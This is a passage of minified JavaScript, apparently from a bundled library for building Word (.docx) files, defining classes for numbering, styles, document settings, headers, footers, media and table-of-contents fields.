Of({wpc:"http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas",mc:"http://schemas.openxmlformats.org/markup-compatibility/2006",o:"urn:schemas-microsoft-com:office:office",r:"http://schemas.openxmlformats.org/officeDocument/2006/relationships",m:"http://schemas.openxmlformats.org/officeDocument/2006/math",v:"urn:schemas-microsoft-com:vml",wp14:"http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing",wp:"http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing",w10:"urn:schemas-microsoft-com:office:word",w:"http://schemas.openxmlformats.org/wordprocessingml/2006/main",w14:"http://schemas.microsoft.com/office/word/2010/wordml",w15:"http://schemas.microsoft.com/office/word/2012/wordml",wpg:"http://schemas.microsoft.com/office/word/2010/wordprocessingGroup",wpi:"http://schemas.microsoft.com/office/word/2010/wordprocessingInk",wne:"http://schemas.microsoft.com/office/word/2006/wordml",wps:"http://schemas.microsoft.com/office/word/2010/wordprocessingShape",cx:"http://schemas.microsoft.com/office/drawing/2014/chartex",cx1:"http://schemas.microsoft.com/office/drawing/2015/9/8/chartex",cx2:"http://schemas.microsoft.com/office/drawing/2015/10/21/chartex",cx3:"http://schemas.microsoft.com/office/drawing/2016/5/9/chartex",cx4:"http://schemas.microsoft.com/office/drawing/2016/5/10/chartex",cx5:"http://schemas.microsoft.com/office/drawing/2016/5/11/chartex",cx6:"http://schemas.microsoft.com/office/drawing/2016/5/12/chartex",cx7:"http://schemas.microsoft.com/office/drawing/2016/5/13/chartex",cx8:"http://schemas.microsoft.com/office/drawing/2016/5/14/chartex",w16cid:"http://schemas.microsoft.com/office/word/2016/wordml/cid",w16se:"http://schemas.microsoft.com/office/word/2015/wordml/symex"}))}get ReferenceId(){return this.refId}add(Ce){this.root.push(Ce)}}class pl{constructor(Ce,nt,Dt){this.media=Ce,this.header=new fl(nt,Dt),this.relationships=new Hm}add(Ce){return this.header.add(Ce),this}addChildElement(Ce){this.header.addChildElement(Ce)}get View(){return this.header}get Relationships(){return this.relationships}get Media(){return this.media}}class dd{constructor(){this.map=new Map}addMedia(Ce,nt){const Dt=`${(0,ha.EL)()}.png`,di={stream:"string"==typeof Ce?this.convertDataURIToBinary(Ce):Ce,fileName:Dt,transformation:{pixels:{x:Math.round(nt.width),y:Math.round(nt.height)},emus:{x:Math.round(9525*nt.width),y:Math.round(9525*nt.height)},flip:nt.flip,rotation:nt.rotation?6e4*nt.rotation:void 0}};return this.map.set(Dt,di),di}addImage(Ce,nt){this.map.set(Ce,nt)}get Array(){return Array.from(this.map.values())}convertDataURIToBinary(Ce){const nt=";base64,",Dt=Ce.indexOf(nt)+nt.length;return"function"==typeof atob?new Uint8Array(atob(Ce.substring(Dt)).split("").map(di=>di.charCodeAt(0))):new(ae(8764).Buffer)(Ce,"base64")}}const eh="";var ks,Xd;!function(Se){Se.BULLET="bullet",Se.CARDINAL_TEXT="cardinalText",Se.CHICAGO="chicago",Se.DECIMAL="decimal",Se.DECIMAL_ENCLOSED_CIRCLE="decimalEnclosedCircle",Se.DECIMAL_ENCLOSED_FULLSTOP="decimalEnclosedFullstop",Se.DECIMAL_ENCLOSED_PARENTHESES="decimalEnclosedParen",Se.DECIMAL_ZERO="decimalZero",Se.LOWER_LETTER="lowerLetter",Se.LOWER_ROMAN="lowerRoman",Se.NONE="none",Se.ORDINAL_TEXT="ordinalText",Se.UPPER_LETTER="upperLetter",Se.UPPER_ROMAN="upperRoman"}(ks||(ks={}));class v_ extends b{constructor(){super(...arguments),this.xmlKeys={ilvl:"w:ilvl",tentative:"w15:tentative"}}}class mC extends E{constructor(Ce){super("w:numFmt"),this.root.push(new _({val:Ce}))}}class Yd extends E{constructor(Ce){super("w:lvlText"),this.root.push(new _({val:Ce}))}}class T0 extends E{constructor(Ce){super("w:lvlJc"),this.root.push(new _({val:Ce}))}}!function(Se){Se.NOTHING="nothing",Se.SPACE="space",Se.TAB="tab"}(Xd||(Xd={}));class E0 extends E{constructor(Ce){super("w:suff"),this.root.push(new _({val:Ce}))}}class Nf extends E{constructor(){super("w:isLgl")}}class th extends E{constructor({level:Ce,format:nt,text:Dt,alignment:di=O.START,start:pi=1,style:Hi,suffix:_a,isLegalNumberingStyle:Ya}){if(super("w:lvl"),this.root.push(new v("w:start",(0,z.vH)(pi))),nt&&this.root.push(new mC(nt)),_a&&this.root.push(new E0(_a)),Ya&&this.root.push(new Nf),Dt&&this.root.push(new Yd(Dt)),this.root.push(new T0(di)),this.paragraphProperties=new dl(Hi&&Hi.paragraph),this.runProperties=new $e(Hi&&Hi.run),this.root.push(this.paragraphProperties),this.root.push(this.runProperties),Ce>9)throw new Error("Level cannot be greater than 9. Read more here: https://answers.microsoft.com/en-us/msoffice/forum/all/does-word-support-more-than-9-list-levels/d130fdcd-1781-446d-8c84-c6c79124e4d7");this.root.push(new v_({ilvl:(0,z.vH)(Ce),tentative:1}))}}class A_ extends th{}class jm extends th{}class D0 extends E{constructor(Ce){super("w:multiLevelType"),this.root.push(new _({val:Ce}))}}class x0 extends b{constructor(){super(...arguments),this.xmlKeys={abstractNumId:"w:abstractNumId",restartNumberingAfterBreak:"w15:restartNumberingAfterBreak"}}}class md extends E{constructor(Ce,nt){super("w:abstractNum"),this.root.push(new x0({abstractNumId:(0,z.vH)(Ce),restartNumberingAfterBreak:0})),this.root.push(new D0("hybridMultilevel")),this.id=Ce;for(const Dt of nt)this.root.push(new A_(Dt))}}class uC extends E{constructor(Ce){super("w:abstractNumId"),this.root.push(new _({val:Ce}))}}class Qm extends b{constructor(){super(...arguments),this.xmlKeys={numId:"w:numId"}}}class ih extends E{constructor(Ce){super("w:num"),this.numId=Ce.numId,this.reference=Ce.reference,this.instance=Ce.instance,this.root.push(new Qm({numId:(0,z.vH)(Ce.numId)})),this.root.push(new uC((0,z.vH)(Ce.abstractNumId))),Ce.overrideLevel&&this.root.push(new hC(Ce.overrideLevel.num,Ce.overrideLevel.start))}}class Lf extends b{constructor(){super(...arguments),this.xmlKeys={ilvl:"w:ilvl"}}}class hC extends E{constructor(Ce,nt){super("w:lvlOverride"),this.root.push(new Lf({ilvl:Ce})),void 0!==nt&&this.root.push(new w0(nt))}}class T_ extends b{constructor(){super(...arguments),this.xmlKeys={val:"w:val"}}}class w0 extends E{constructor(Ce){super("w:startOverride"),this.root.push(new T_({val:Ce}))}}class I0 extends E{constructor(Ce){super("w:numbering"),this.abstractNumberingMap=new Map,this.concreteNumberingMap=new Map,this.referenceConfigMap=new Map,this.root.push(new ko({wpc:"http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas",mc:"http://schemas.openxmlformats.org/markup-compatibility/2006",o:"urn:schemas-microsoft-com:office:office",r:"http://schemas.openxmlformats.org/officeDocument/2006/relationships",m:"http://schemas.openxmlformats.org/officeDocument/2006/math",v:"urn:schemas-microsoft-com:vml",wp14:"http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing",wp:"http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing",w10:"urn:schemas-microsoft-com:office:word",w:"http://schemas.openxmlformats.org/wordprocessingml/2006/main",w14:"http://schemas.microsoft.com/office/word/2010/wordml",w15:"http://schemas.microsoft.com/office/word/2012/wordml",wpg:"http://schemas.microsoft.com/office/word/2010/wordprocessingGroup",wpi:"http://schemas.microsoft.com/office/word/2010/wordprocessingInk",wne:"http://schemas.microsoft.com/office/word/2006/wordml",wps:"http://schemas.microsoft.com/office/word/2010/wordprocessingShape",Ignorable:"w14 w15 wp14"}));const nt=new md((0,ha.NY)(),[{level:0,format:ks.BULLET,text:"\u25cf",alignment:O.LEFT,style:{paragraph:{indent:{left:(0,ha.vw)(.5),hanging:(0,ha.vw)(.25)}}}},{level:1,format:ks.BULLET,text:"\u25cb",alignment:O.LEFT,style:{paragraph:{indent:{left:(0,ha.vw)(1),hanging:(0,ha.vw)(.25)}}}},{level:2,format:ks.BULLET,text:"\u25a0",alignment:O.LEFT,style:{paragraph:{indent:{left:2160,hanging:(0,ha.vw)(.25)}}}},{level:3,format:ks.BULLET,text:"\u25cf",alignment:O.LEFT,style:{paragraph:{indent:{left:2880,hanging:(0,ha.vw)(.25)}}}},{level:4,format:ks.BULLET,text:"\u25cb",alignment:O.LEFT,style:{paragraph:{indent:{left:3600,hanging:(0,ha.vw)(.25)}}}},{level:5,format:ks.BULLET,text:"\u25a0",alignment:O.LEFT,style:{paragraph:{indent:{left:4320,hanging:(0,ha.vw)(.25)}}}},{level:6,format:ks.BULLET,text:"\u25cf",alignment:O.LEFT,style:{paragraph:{indent:{left:5040,hanging:(0,ha.vw)(.25)}}}},{level:7,format:ks.BULLET,text:"\u25cf",alignment:O.LEFT,style:{paragraph:{indent:{left:5760,hanging:(0,ha.vw)(.25)}}}},{level:8,format:ks.BULLET,text:"\u25cf",alignment:O.LEFT,style:{paragraph:{indent:{left:6480,hanging:(0,ha.vw)(.25)}}}}]);this.concreteNumberingMap.set("default-bullet-numbering",new ih({numId:1,abstractNumId:nt.id,reference:"default-bullet-numbering",instance:0,overrideLevel:{num:0,start:1}})),this.abstractNumberingMap.set("default-bullet-numbering",nt);for(const Dt of Ce.config)this.abstractNumberingMap.set(Dt.reference,new md((0,ha.NY)(),Dt.levels)),this.referenceConfigMap.set(Dt.reference,Dt.levels)}prepForXml(Ce){for(const nt of this.abstractNumberingMap.values())this.root.push(nt);for(const nt of this.concreteNumberingMap.values())this.root.push(nt);return super.prepForXml(Ce)}createConcreteNumberingInstance(Ce,nt){const Dt=this.abstractNumberingMap.get(Ce);if(!Dt)return;const di=`${Ce}-${nt}`;if(this.concreteNumberingMap.has(di))return;const pi=this.referenceConfigMap.get(Ce),Hi=pi&&pi[0].start,_a={numId:(0,ha.NY)(),abstractNumId:Dt.id,reference:Ce,instance:nt,overrideLevel:Hi&&Number.isInteger(Hi)?{num:0,start:Hi}:{num:0,start:1}};this.concreteNumberingMap.set(di,new ih(_a))}get ConcreteNumbering(){return Array.from(this.concreteNumberingMap.values())}get ReferenceConfig(){return Array.from(this.referenceConfigMap.values())}}class _l extends b{constructor(){super(...arguments),this.xmlKeys={version:"w:val",name:"w:name",uri:"w:uri"}}}class R0 extends E{constructor(Ce){super("w:compatSetting"),this.root.push(new _l({version:Ce,uri:"http://schemas.microsoft.com/office/word",name:"compatibilityMode"}))}}class ah extends E{constructor(Ce){super("w:compat"),void 0!==Ce.doNotExpandShiftReturn&&this.root.push(new l("w:doNotExpandShiftReturn",Ce.doNotExpandShiftReturn)),Ce.version&&this.root.push(new R0(Ce.version))}}class $m extends b{constructor(){super(...arguments),this.xmlKeys={wpc:"xmlns:wpc",mc:"xmlns:mc",o:"xmlns:o",r:"xmlns:r",m:"xmlns:m",v:"xmlns:v",wp14:"xmlns:wp14",wp:"xmlns:wp",w10:"xmlns:w10",w:"xmlns:w",w14:"xmlns:w14",w15:"xmlns:w15",wpg:"xmlns:wpg",wpi:"xmlns:wpi",wne:"xmlns:wne",wps:"xmlns:wps",Ignorable:"mc:Ignorable"}}}class E_ extends E{constructor(Ce){super("w:settings"),this.root.push(new $m({wpc:"http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas",mc:"http://schemas.openxmlformats.org/markup-compatibility/2006",o:"urn:schemas-microsoft-com:office:office",r:"http://schemas.openxmlformats.org/officeDocument/2006/relationships",m:"http://schemas.openxmlformats.org/officeDocument/2006/math",v:"urn:schemas-microsoft-com:vml",wp14:"http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing",wp:"http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing",w10:"urn:schemas-microsoft-com:office:word",w:"http://schemas.openxmlformats.org/wordprocessingml/2006/main",w14:"http://schemas.microsoft.com/office/word/2010/wordml",w15:"http://schemas.microsoft.com/office/word/2012/wordml",wpg:"http://schemas.microsoft.com/office/word/2010/wordprocessingGroup",wpi:"http://schemas.microsoft.com/office/word/2010/wordprocessingInk",wne:"http://schemas.microsoft.com/office/word/2006/wordml",wps:"http://schemas.microsoft.com/office/word/2010/wordprocessingShape",Ignorable:"w14 w15 wp14"})),this.root.push(new l("w:displayBackgroundShape",!0)),void 0!==Ce.trackRevisions&&this.root.push(new l("w:trackRevisions",Ce.trackRevisions)),void 0!==Ce.evenAndOddHeaders&&this.root.push(new l("w:evenAndOddHeaders",Ce.evenAndOddHeaders)),void 0!==Ce.updateFields&&this.root.push(new l("w:updateFields",Ce.updateFields)),this.root.push(new ah({version:Ce.compatabilityModeVersion||15}))}}class Jd extends b{constructor(){super(...arguments),this.xmlKeys={val:"w:val"}}}class Km extends E{constructor(Ce){super("w:name"),this.root.push(new Jd({val:Ce}))}}class S0 extends E{constructor(Ce){super("w:uiPriority"),this.root.push(new Jd({val:(0,z.vH)(Ce)}))}}class D_ extends b{constructor(){super(...arguments),this.xmlKeys={type:"w:type",styleId:"w:styleId",default:"w:default",customStyle:"w:customStyle"}}}class x_ extends E{constructor(Ce,nt){super("w:style"),this.root.push(new D_(Ce)),nt.name&&this.root.push(new Km(nt.name)),nt.basedOn&&this.root.push(new A("w:basedOn",nt.basedOn)),nt.next&&this.root.push(new A("w:next",nt.next)),nt.link&&this.root.push(new A("w:link",nt.link)),void 0!==nt.uiPriority&&this.root.push(new S0(nt.uiPriority)),void 0!==nt.semiHidden&&this.root.push(new l("w:semiHidden",nt.semiHidden)),void 0!==nt.unhideWhenUsed&&this.root.push(new l("w:unhideWhenUsed",nt.unhideWhenUsed)),void 0!==nt.quickFormat&&this.root.push(new l("w:qFormat",nt.quickFormat))}}class Zd extends x_{constructor(Ce){super({type:"paragraph",styleId:Ce.id},Ce),this.paragraphProperties=new dl(Ce.paragraph),this.runProperties=new $e(Ce.run),this.root.push(this.paragraphProperties),this.root.push(this.runProperties)}}class ud extends x_{constructor(Ce){super({type:"character",styleId:Ce.id},Object.assign({uiPriority:99,unhideWhenUsed:!0},Ce)),this.runProperties=new $e(Ce.run),this.root.push(this.runProperties)}}class gl extends Zd{constructor(Ce){super(Object.assign(Object.assign({},Ce),{basedOn:"Normal",next:"Normal",quickFormat:!0}))}}class nh extends gl{constructor(Ce){super(Object.assign(Object.assign({},Ce),{id:"Title",name:"Title"}))}}class Xm extends gl{constructor(Ce){super(Object.assign(Object.assign({},Ce),{id:"Heading1",name:"Heading 1"}))}}class k0 extends gl{constructor(Ce){super(Object.assign(Object.assign({},Ce),{id:"Heading2",name:"Heading 2"}))}}class w_ extends gl{constructor(Ce){super(Object.assign(Object.assign({},Ce),{id:"Heading3",name:"Heading 3"}))}}class zf extends gl{constructor(Ce){super(Object.assign(Object.assign({},Ce),{id:"Heading4",name:"Heading 4"}))}}class Ym extends gl{constructor(Ce){super(Object.assign(Object.assign({},Ce),{id:"Heading5",name:"Heading 5"}))}}class fC extends gl{constructor(Ce){super(Object.assign(Object.assign({},Ce),{id:"Heading6",name:"Heading 6"}))}}class ba extends gl{constructor(Ce){super(Object.assign(Object.assign({},Ce),{id:"Strong",name:"Strong"}))}}class Us extends Zd{constructor(Ce){super(Object.assign(Object.assign({},Ce),{id:"ListParagraph",name:"List Paragraph",basedOn:"Normal",quickFormat:!0}))}}class I_ extends Zd{constructor(Ce){super(Object.assign(Object.assign({},Ce),{id:"FootnoteText",name:"footnote text",link:"FootnoteTextChar",basedOn:"Normal",uiPriority:99,semiHidden:!0,unhideWhenUsed:!0,paragraph:{spacing:{after:0,line:240,lineRule:qt.AUTO}},run:{size:20}}))}}class P0 extends ud{constructor(Ce){super(Object.assign(Object.assign({},Ce),{id:"FootnoteReference",name:"footnote reference",basedOn:"DefaultParagraphFont",semiHidden:!0,run:{superScript:!0}}))}}class Vr extends ud{constructor(Ce){super(Object.assign(Object.assign({},Ce),{id:"FootnoteTextChar",name:"Footnote Text Char",basedOn:"DefaultParagraphFont",link:"FootnoteText",semiHidden:!0,run:{size:20}}))}}class Jm extends ud{constructor(Ce){super(Object.assign(Object.assign({},Ce),{id:"Hyperlink",name:"Hyperlink",basedOn:"DefaultParagraphFont",run:{color:"0563C1",underline:{type:le.SINGLE}}}))}}class Hl extends E{constructor(Ce){if(super("w:styles"),Ce.initialStyles&&this.root.push(Ce.initialStyles),Ce.importedStyles)for(const nt of Ce.importedStyles)this.root.push(nt);if(Ce.paragraphStyles)for(const nt of Ce.paragraphStyles)this.root.push(new Zd(nt));if(Ce.characterStyles)for(const nt of Ce.characterStyles)this.root.push(new ud(nt))}}class em extends E{constructor(Ce){super("w:pPrDefault"),this.root.push(new dl(Ce))}}class R_ extends E{constructor(Ce){super("w:rPrDefault"),this.root.push(new $e(Ce))}}class Wf extends E{constructor(Ce){super("w:docDefaults"),this.runPropertiesDefaults=new R_(Ce.run),this.paragraphPropertiesDefaults=new em(Ce.paragraph),this.root.push(this.runPropertiesDefaults),this.root.push(this.paragraphPropertiesDefaults)}}class tm{newInstance(Ce){const nt=(0,y.xml2js)(Ce,{compact:!1});let Dt;for(const pi of nt.elements||[])"w:styles"===pi.name&&(Dt=pi);if(void 0===Dt)throw new Error("can not find styles element");const di=Dt.elements||[];return new Hl({initialStyles:new w(Dt.attributes),importedStyles:di.map(pi=>M(pi))})}}class pC{newInstance(Ce={}){var nt;return{initialStyles:new ko({mc:"http://schemas.openxmlformats.org/markup-compatibility/2006",r:"http://schemas.openxmlformats.org/officeDocument/2006/relationships",w:"http://schemas.openxmlformats.org/wordprocessingml/2006/main",w14:"http://schemas.microsoft.com/office/word/2010/wordml",w15:"http://schemas.microsoft.com/office/word/2012/wordml",Ignorable:"w14 w15"}),importedStyles:[new Wf(null!==(nt=Ce.document)&&void 0!==nt?nt:{}),new nh(Object.assign({run:{size:56}},Ce.title)),new Xm(Object.assign({run:{color:"2E74B5",size:32}},Ce.heading1)),new k0(Object.assign({run:{color:"2E74B5",size:26}},Ce.heading2)),new w_(Object.assign({run:{color:"1F4D78",size:24}},Ce.heading3)),new zf(Object.assign({run:{color:"2E74B5",italics:!0}},Ce.heading4)),new Ym(Object.assign({run:{color:"2E74B5"}},Ce.heading5)),new fC(Object.assign({run:{color:"1F4D78"}},Ce.heading6)),new ba(Object.assign({run:{bold:!0}},Ce.strong)),new Us(Ce.listParagraph||{}),new Jm(Ce.hyperlink||{}),new P0(Ce.footnoteReference||{}),new I_(Ce.footnoteText||{}),new Vr(Ce.footnoteTextChar||{})]}}}class S_{constructor(Ce,nt={}){var Dt,di,pi,Hi,_a,Ya,ca;if(this.currentRelationshipId=1,this.headers=[],this.footers=[],this.coreProperties=new C_(Object.assign(Object.assign({},Ce),{creator:null!==(Dt=Ce.creator)&&void 0!==Dt?Dt:"Un-named",revision:null!==(di=Ce.revision)&&void 0!==di?di:1,lastModifiedBy:null!==(pi=Ce.lastModifiedBy)&&void 0!==pi?pi:"Un-named"})),this.numbering=new I0(Ce.numbering?Ce.numbering:{config:[]}),this.comments=new Jp(null!==(Hi=Ce.comments)&&void 0!==Hi?Hi:{children:[]}),this.fileRelationships=new Hm,this.customProperties=new oC(null!==(_a=Ce.customProperties)&&void 0!==_a?_a:[]),this.appProperties=new nC,this.footnotesWrapper=new M_,this.contentTypes=new M0,this.documentWrapper=new uo({background:Ce.background||{}}),this.settings=new E_({compatabilityModeVersion:Ce.compatabilityModeVersion,evenAndOddHeaders:!!Ce.evenAndOddHeaderAndFooters,trackRevisions:null===(Ya=Ce.features)||void 0===Ya?void 0:Ya.trackRevisions,updateFields:null===(ca=Ce.features)||void 0===ca?void 0:ca.updateFields}),this.media=nt.template&&nt.template.media?nt.template.media:new dd,nt.template&&(this.currentRelationshipId=nt.template.currentRelationshipId+1),nt.template&&Ce.externalStyles)throw Error("can not use both template and external styles");if(nt.template&&nt.template.styles){const ka=new tm;this.styles=ka.newInstance(nt.template.styles)}else if(Ce.externalStyles){const ka=new tm;this.styles=ka.newInstance(Ce.externalStyles)}else if(Ce.styles){const ka=(new pC).newInstance(Ce.styles.default);this.styles=new Hl(Object.assign(Object.assign({},ka),Ce.styles))}else{const ka=new pC;this.styles=new Hl(ka.newInstance())}if(this.addDefaultRelationships(),nt.template&&nt.template.headers)for(const ka of nt.template.headers)this.addHeaderToDocument(ka.header,ka.type);if(nt.template&&nt.template.footers)for(const ka of nt.template.footers)this.addFooterToDocument(ka.footer,ka.type);for(const ka of Ce.sections)this.addSection(ka);if(Ce.footnotes)for(const ka in Ce.footnotes)this.footnotesWrapper.View.createFootNote(parseFloat(ka),Ce.footnotes[ka].children)}addSection({headers:Ce={},footers:nt={},children:Dt,properties:di}){this.documentWrapper.View.Body.addSection(Object.assign(Object.assign({},di),{headerWrapperGroup:{default:Ce.default?this.createHeader(Ce.default):void 0,first:Ce.first?this.createHeader(Ce.first):void 0,even:Ce.even?this.createHeader(Ce.even):void 0},footerWrapperGroup:{default:nt.default?this.createFooter(nt.default):void 0,first:nt.first?this.createFooter(nt.first):void 0,even:nt.even?this.createFooter(nt.even):void 0}}));for(const pi of Dt)this.documentWrapper.View.add(pi)}createHeader(Ce){const nt=new pl(this.media,this.currentRelationshipId++);for(const Dt of Ce.options.children)nt.add(Dt);return this.addHeaderToDocument(nt),nt}createFooter(Ce){const nt=new hl(this.media,this.currentRelationshipId++);for(const Dt of Ce.options.children)nt.add(Dt);return this.addFooterToDocument(nt),nt}addHeaderToDocument(Ce,nt=Pt.DEFAULT){this.headers.push({header:Ce,type:nt}),this.documentWrapper.Relationships.createRelationship(Ce.View.ReferenceId,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/header",`header${this.headers.length}.xml`),this.contentTypes.addHeader(this.headers.length)}addFooterToDocument(Ce,nt=Pt.DEFAULT){this.footers.push({footer:Ce,type:nt}),this.documentWrapper.Relationships.createRelationship(Ce.View.ReferenceId,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer",`footer${this.footers.length}.xml`),this.contentTypes.addFooter(this.footers.length)}addDefaultRelationships(){this.fileRelationships.createRelationship(1,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument","word/document.xml"),this.fileRelationships.createRelationship(2,"http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties","docProps/core.xml"),this.fileRelationships.createRelationship(3,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties","docProps/app.xml"),this.fileRelationships.createRelationship(4,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/custom-properties","docProps/custom.xml"),this.documentWrapper.Relationships.createRelationship(this.currentRelationshipId++,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles","styles.xml"),this.documentWrapper.Relationships.createRelationship(this.currentRelationshipId++,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering","numbering.xml"),this.documentWrapper.Relationships.createRelationship(this.currentRelationshipId++,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes","footnotes.xml"),this.documentWrapper.Relationships.createRelationship(this.currentRelationshipId++,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings","settings.xml"),this.documentWrapper.Relationships.createRelationship(this.currentRelationshipId++,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/comments","comments.xml")}get Document(){return this.documentWrapper}get Styles(){return this.styles}get CoreProperties(){return this.coreProperties}get Numbering(){return this.numbering}get Media(){return this.media}get FileRelationships(){return this.fileRelationships}get Headers(){return this.headers.map(Ce=>Ce.header)}get Footers(){return this.footers.map(Ce=>Ce.footer)}get ContentTypes(){return this.contentTypes}get CustomProperties(){return this.customProperties}get AppProperties(){return this.appProperties}get FootNotes(){return this.footnotesWrapper}get Settings(){return this.settings}get Comments(){return this.comments}}const ni="";class O0 extends E{constructor(Ce={}){super("w:instrText"),this.properties=Ce,this.root.push(new Be({space:ee.PRESERVE}));let nt="TOC";this.properties.captionLabel&&(nt=`${nt} \\a "${this.properties.captionLabel}"`),this.properties.entriesFromBookmark&&(nt=`${nt} \\b "${this.properties.entriesFromBookmark}"`),this.properties.captionLabelIncludingNumbers&&(nt=`${nt} \\c "${this.properties.captionLabelIncludingNumbers}"`),this.properties.sequenceAndPageNumbersSeparator&&(nt=`${nt} \\d "${this.properties.sequenceAndPageNumbersSeparator}"`),this.properties.tcFieldIdentifier&&(nt=`${nt} \\f "${this.properties.tcFieldIdentifier}"`),this.properties.hyperlink&&(nt=`${nt} \\h`),this.properties.tcFieldLevelRange&&(nt=`${nt} \\l "${this.properties.tcFieldLevelRange}"`),this.properties.pageNumbersEntryLevelsRange&&(nt=`${nt} \\n "${this.properties.pageNumbersEntryLevelsRange}"`),this.properties.headingStyleRange&&(nt=`${nt} \\o "${this.properties.headingStyleRange}"`),this.properties.entryAndPageNumberSeparator&&(nt=`${nt} \\p "${this.properties.entryAndPageNumberSeparator}"`),this.properties.seqFieldIdentifierForPrefix&&(nt=`${nt} \\s "${this.properties.seqFieldIdentifierForPrefix}"`),this.properties.stylesWithLevels&&this.properties.stylesWithLevels.length&&(nt=`${nt} \\t "${this.properties.stylesWithLevels.map(Dt=>`${Dt.styleName},${Dt.level}`).join(",")}"`),this.properties.useAppliedParagraphOutlineLevel&&(nt=`${nt} \\u`),this.properties.preserveTabInEntries&&(nt=`${nt} \\w`),this.properties.preserveNewLineInEntries&&(nt=`${nt} \\x`),this.properties.hideTabAndPageNumbersInWebView&&(nt=`${nt} \\z`),this.root.push(nt)}}class _C extends E{constructor(){super("w:sdtContent")}}class ps extends b{constructor(){super(...arguments),this.xmlKeys={alias:"w:val"}}}class Ff extends E{constructor(Ce){super("w:alias"),this.root.push(new ps({alias:Ce}))}}class WM extends E{constructor(Ce){super("w:sdtPr"),this.root.push(new Ff(Ce))}}class FM extends E{constructor(Ce="Table of Contents",nt){super("w:sdt"),this.root.push(new WM(Ce));const Dt=new _C,di=new uc({children:[new pt({children:[new Ue(!0),new O0(nt),new Xe]})]});Dt.addChildElement(di);const pi=new uc({children:[new pt({children:[new He]})]});Dt.addChildElement(pi),this.root.push(Dt)}}class gC{constructor(Ce,nt){this.styleName=Ce,this.level=nt}}class im{constructor(Ce={children:[]}){this.options=Ce}}class VM{constructor(Ce={children:[]}){this.options=Ce}}class CC extends b{constructor(){super(...arguments),this.xmlKeys={id:"w:id"}}}class Er extends E{constructor(Ce){super("w:footnoteReference"),this.root.push(new CC({id:Ce}))}}class k_ extends pt{constructor(Ce){super({style:"FootnoteReference"}),this.root.push(new Er(Ce))}}class oh extends E{constructor(Ce){super("w:ins"),this.root.push(new Ke({id:Ce.id,author:Ce.author,date:Ce.date})),this.addChildElement(new vt(Ce))}}class BM extends E{constructor(){super("w:delInstrText"),this.root.push(new Be({space:ee.PRESERVE})),this.root.push("PAGE")}}class yC extends E{constructor(){super("w:delInstrText"),this.root.push(new Be({space:ee.PRESERVE})),this.root.push("NUMPAGES")}}class ac extends E{constructor(){super("w:delInstrText"),this.root.push(new Be({space:ee.PRESERVE})),this.root.push("SECTIONPAGES")}}class Wc extends E{constructor(Ce){super("w:delText"),this.root.push(new Be({space:ee.PRESERVE})),this.root.push(Ce)}}class P_ extends E{constructor(Ce){super("w:del"),this.root.push(new Ke({id:Ce.id,author:Ce.author,date:Ce.date})),this.deletedTextRunWrapper=new rh(Ce),this.addChildElement(this.deletedTextRunWrapper)}}class rh extends E{constructor(Ce){if(super("w:r"),this.root.push(new $e(Ce)),Ce.children)for(const nt of Ce.children)if("string"!=typeof nt)this.root.push(nt);else switch(nt){case ye.CURRENT:this.root.push(new Ue),this.root.push(new BM),this.root.push(new Xe),this.root.push(new He);break;case ye.TOTAL_PAGES:this.root.push(new Ue),this.root.push(new yC),this.root.push(new Xe),this.root.push(new He);break;case ye.TOTAL_PAGES_IN_SECTION:this.root.push(new Ue),this.root.push(new ac),this.root.push(new Xe),this.root.push(new He);break;default:this.root.push(new Wc(nt))}else Ce.text&&this.root.push(new Wc(Ce.text));if(Ce.break)for(let nt=0;nt<Ce.break;nt++)this.root.splice(1,0,new Ie)}}var hd,Zm,O_;(function(Se){Se.CENTER="center",Se.INSIDE="inside",Se.LEFT="left",Se.OUTSIDE="outside",Se.RIGHT="right"})(hd||(hd={})),function(Se){Se.BOTTOM="bottom",Se.CENTER="center",Se.INSIDE="inside",Se.OUTSIDE="outside",Se.TOP="top"}(Zm||(Zm={})),function(Se){Se.DECIMAL="decimal",Se.UPPER_ROMAN="upperRoman",Se.LOWER_ROMAN="lowerRoman",Se.UPPER_LETTER="upperLetter",Se.LOWER_LETTER="lowerLetter",Se.ORDINAL="ordinal",Se.CARDINAL_TEXT="cardinalText",Se.ORDINAL_TEXT="ordinalText",Se.HEX="hex",Se.CHICAGO="chicago",Se.IDEOGRAPH_DIGITAL="ideographDigital",Se.JAPANESE_COUNTING="japaneseCounting",Se.AIUEO="aiueo",Se.IROHA="iroha",Se.DECIMAL_FULL_WIDTH="decimalFullWidth",Se.DECIMAL_HALF_WIDTH="decimalHalfWidth",Se.JAPANESE_LEGAL="japaneseLegal",Se.JAPANESE_DIGITAL_TEN_THOUSAND="japaneseDigitalTenThousand",Se.DECIMAL_ENCLOSED_CIRCLE="decimalEnclosedCircle",Se.DECIMAL_FULL_WIDTH_2="decimalFullWidth2",Se.AIUEO_FULL_WIDTH="aiueoFullWidth",Se.IROHA_FULL_WIDTH="irohaFullWidth",Se.DECIMAL_ZERO="decimalZero",Se.BULLET="bullet",Se.GANADA="ganada",Se.CHOSUNG="chosung",Se.DECIMAL_ENCLOSED_FULL_STOP="decimalEnclosedFullstop",Se.DECIMAL_ENCLOSED_PAREN="decimalEnclosedParen",Se.DECIMAL_ENCLOSED_CIRCLE_CHINESE="decimalEnclosedCircleChinese",Se.IDEOGRAPH_ENCLOSED_CIRCLE="ideographEnclosedCircle",Se.IDEOGRAPH_TRADITIONAL="ideographTraditional",Se.IDEOGRAPH_ZODIAC="ideographZodiac",Se.IDEOGRAPH_ZODIAC_TRADITIONAL="ideographZodiacTraditional",Se.TAIWANESE_COUNTING